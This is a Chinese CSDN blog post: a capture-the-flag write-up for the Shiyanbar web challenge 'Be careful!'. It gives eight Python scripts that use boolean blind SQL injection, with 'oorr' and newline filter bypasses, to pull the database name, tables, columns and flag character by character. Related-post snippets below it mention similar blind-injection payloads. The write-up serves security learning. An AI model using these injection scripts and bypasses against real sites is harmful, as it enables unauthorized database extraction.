实验吧web-难-认真一点!(布尔盲注之mid(),py脚本)

最新推荐文章于 2024-04-30 21:19:09 发布
最新推荐文章于 2024-04-30 21:19:09 发布
阅读量599 收藏 1
点赞数
分类专栏: sql注入 实验吧web 文章标签: 实验吧 bool盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/86299019
版权

也可用bp进行爆破,这里用py脚本。

打看网页输入1,显示You are in,输入2,显示You are not in,是个布尔注入。

然后看看过滤了什么。

sql注入没有过滤:--+、or

sql注入过滤:union select、and、order by、空格

虽然or没有被当做sql注入处理,但是构造id=1'/**/or/**/1'='1--+时仍然是返回,You are not in。
所以应该是,or仍然被过滤,只是没有被当做sql注入,于是利用oorr来绕过。

下面给出爆破脚本:

1.暴库长

import requests

s='You are in'
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(30):
	key={'id':"0'oorr(length(database())=%s)oorr'0"%i}
	r=requests.post(url,data=key).text
	print(i)
	if s in r:
		print(i)
		break

结果是18.

2.爆库名

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
p='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
database=''
for i in range(19):
	for j in p:
		key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
		r=requests.post(url,data=key).text
		
		if s in r:
			database+=j
			print(database)
			break
print('answer is:')
print(database)

结果是:ctf_sql_bool_blind

3.爆表长

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
s='You are in'
i=1
while True:
	pay="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
	pay=pay.replace(' ',chr(0x0a))
	key={'id':pay}
	r=requests.post(url,data=key).text
	print(key)
	if s in r:
		print(i)
		break
	i+=1

结果是:11

4.爆表名

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
tables=''
for i in range(12):
	for j in guess:
		flag="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
		#flag="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
		flag=flag.replace(' ',chr(0x0a))
		pay={'id':flag}
		r=requests.post(url,data=pay).text
		print(pay)

		if s in r:
			tables+=j
			print(j)
			break

print (tables)

结果是:fiag@users

显然我们需要的是fiag。

5.爆列长

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'

i=1
while True:
	flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
	flag=flag.replace(' ',chr(0x0a))
	pay={'id':flag}
	r=requests.post(url,data=pay).text
	print(pay)
	if s in r:
		print(i)
		break
	i+=1

结果是:6

6.爆列名

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
columns=''

for i in range(1,7):
	for j in guess:
		flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
		#flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
		flag=flag.replace(' ',chr(0x0a))
		pay={'id':flag}
		r=requests.post(url,data=pay).text
		print(pay)
		if s in r:
			columns+=j
			print(j)
			break
print(columns)

结果是:fl$4g

7.爆字段长

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'

i=1
while True:
	pay={'id':"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i}
	r=requests.post(url,data=pay).text
	print(pay)
	if s in r:
		print(i)
		break
	i+=1

结果是13

8.爆字段

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
dump=''

for i in range(1,15):
	for j in guess:
		pay={'id':"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)}
		r=requests.post(url,data=pay).text
		print(pay)
		if s in r:
			dump+=j
			print(j)
			break
print(dump)

结果竟然是flag{haha~you。

蒙圈,看了大佬的wp才知道,原来第十四位是‘ ’,不过估计后面的内容也不长,于是改个数字继续跑就跑出结果了。

大千SS
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 871
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
sql注入之布尔注入--实验吧-认真一点啊!
qq_25987491的博客
04-24 1987
原文:https://www.jianshu.com/p/11f409992681先简单地试试,发现输入1会回显You are in,输入其他会回显You are not in,而输入1'也会回显You are not in,这说明单引号没有被吃掉,还可以使用。继续测试发现过滤了and、空格和|,or没有被过滤。构造id=1'or%0a'1或者id=1'or/**/'1,看到的回显却是You ar...
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 390
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
IE安全(盲注py脚本)
weixin_43801718的博客
03-30 153
GET布尔盲注 import requests import time import datetime # 获取数据库名长度 def database_len(): for i in range(1, 10): url = '''http://10.211.55.7/sqli-labs-master/Less-8/''' payloa...
布尔盲注Python脚本
末初的CSDN博客
03-12 6955
布尔盲注Python脚本,功能完整,可以参考一下大致结构,如果觉得有什么写的不足的地方,请尽管留言指正,一起交流进步
认真一点!-实验
Xi4or0uji
06-05 3068
这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected然后fuzz一下,图我就不贴了,做的时候忘了截下图结果大概是过滤了and,空格,逗号,union,+这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊试了...
sql盲注py脚本
pop364的博客
04-24 459
import requests #url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no=' #url = "http://localhost/sqli-labs-master/Less-1/?id=1'" url = "http://challenge-8001a3f6b43953f3.sandb...
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.pybool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
SQL注入之基于布尔盲注详解
09-10
在实际操作中,由于手动进行布尔盲注非常耗时,通常会编写自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
【SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意的SQL语句来控制或篡改数据库。本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **...
stunning-octo-goggles:你好! 随时在这些代码和脚本中编写代码!
03-10
"stunning-octo-goggles" 这个项目名似乎取自互联网文化中的"Octocat"形象,它常被用来代表GitHub和编程社区。...对于想要深入IT领域,尤其是Web开发和脚本编程的初学者来说,这是一个很好的实践案例。
python脚本实现半自动化布尔盲注
weixin_44255856的博客
04-27 878
原文链接:http://zzqsmile.top/2018/06/04/python3/2018-06-04-布尔盲注/ from optparse import OptionParser import sys import requests import hashlib parser=OptionParser() parser.add_option("-D", "--database", a...
Python】测试布尔盲注脚本
weixin_30457881的博客
11-16 334
sqli-labs第八关:单引号布尔盲注,手工测出database长度,个人觉得手工比较快 然后使用脚本测database内容,这个脚本就比手工快多了,脚本内容如下: 1 import sys 2 import requests 3 4 url="http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s" 5 payload="...
基于布尔注入的Python代码
3569
06-25 1277
基于布尔型注入,能够爆数据库,表,字段的Python代码#!/usr/bin/env python #coding=utf-8import sys import requests import re import binasciidef http_get(url): return requests.get(url) passdef dichotomy(sql): #二分法
基础的盲注脚本
m0_57131590的博客
09-23 161
脚本只是一个单纯的遍历,没有用二分法,简单易懂。 import requests req = requests.Session() url='xxxx' result='' proxies={'http': 'xxx'}//方便调试 header={ "Cookie": "xxxx", "User-Agent": "xxxx", "Content-Type": "xxxx", "Origin": "xxxxx" } def baoshuju(url,proxies):
sql注入种类以及测试方式和python脚本
欢迎来到神林的博客
04-26 3089
sql 注入: 1.sql注入最重要的过程,单引号判断注入最常见。 分为三大类:get、post、cookie 简单判断get型: http://host/test.php?id=100’ 返回错误说明有可能注入 http://host/test.php?id=100 and 1=1 返回正常 http://host/test.php?id=100 and 1=2返回错误 如果出现以上三种错...
时间盲注布尔盲注脚本
星星的博客
07-01 395
sql盲注
shell中的脚本程序(四)(for语句,if语句,while语句脚本
qq_39376481的博客
03-22 3064
1.for语句实验: <1>新建一个脚本,正序输出1~10 [root@shenzhen linux]# vim file.sh [root@shenzhen linux]# sh file.sh 脚本中的内容如下: #!/bin/bash for i in {1..10} do echo $i done 或者也可以写成这种: #!/bin/bash for i...
sql注入布尔盲注脚本
08-23
对于SQL注入布尔盲注攻击,你可以使用以下脚本示例: ``` SELECT * FROM users WHERE username = 'admin' AND IF(LENGTH(database()) > 1, SLEEP(5), 0); SELECT * FROM users WHERE username = 'admin' AND IF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值